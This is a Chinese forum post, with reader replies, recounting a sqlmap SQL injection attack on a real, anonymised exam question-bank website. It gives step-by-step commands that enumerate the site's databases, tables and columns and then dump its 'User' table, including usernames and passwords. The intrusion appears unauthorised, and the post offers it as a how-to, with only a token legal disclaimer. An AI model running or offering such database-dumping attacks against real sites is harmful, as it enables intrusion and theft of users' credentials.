【原创】sqlmap之某考试题库站点

Msl

如果无法播放，请点击此处在新窗口打开

   


                                                  #请遵守计算机法律！
  注意！本文章仅作交流使用，造成他人犯罪与作者无关！
目标:某考试题库站点              ---Msl                     QQ:1920168505



确定注入点后，在放到sqlmap里检测下

打开终端，输入sqlmap –u http://www.xxx.com/xx.asp?id=xx













从上图可看出，此站点存在注入，而且这个注入点是对的

目标系统为Windows 2012 R2版本

IIS版本8.5

数据库mssqlserver 2012



为了节省时间，我就直接找有用的数据吧···



列出数据库

sqlmap –u http://www.xxx.com/xx.asp?id=xx –dbs






      2.从上图可看出，目标站点数据库已经列出来了，上面三个是系统的，最下边的才是我想要的···



接下来获取它的表

sqlmap –u http://www.xxx.com/xx.asp?id=xx  --tables “xxx”









出来了，接下来先看看User列

sqlmap –u http://www.xxx.com/xx.asp?id=xx  --columns -T “User” -D “xxx”










如果想单独获取username和password

可以输入

sqlmap –u http://www.xxx.com/xx.asp?id=xx  --dump –C “username,password” -T “User” -D “xxx”


我就直接全脱出来吧

sqlmap –u http://www.xxx.com/xx.asp?id=xx  --dump -T “User” -D “xxx”







由于网络问题，所以我改成了这个






上图是效果图···

好了，就到这里吧，后面就不给大家看了，毕竟数据公开不好~.~



附上本人百度网盘分享链接http://pan.baidu.com/share/home?uk=3155889364&view=share#category/type=0
挑选你需要的教程保存即可（别说我分享的太多你保存起来慢。。。）

王珂

这是SQLmap科普吗？

conosc

分享万岁。。。~\(≧▽≦)/~

fireworld

学习学习技术，加油！

fireworld

asion

还是不错的哦，顶了

Jack-5

若冰

还是不错的哦，顶了

CHRIS

还是不错的哦，顶了

小龙

支持中国红客联盟(ihonker.org)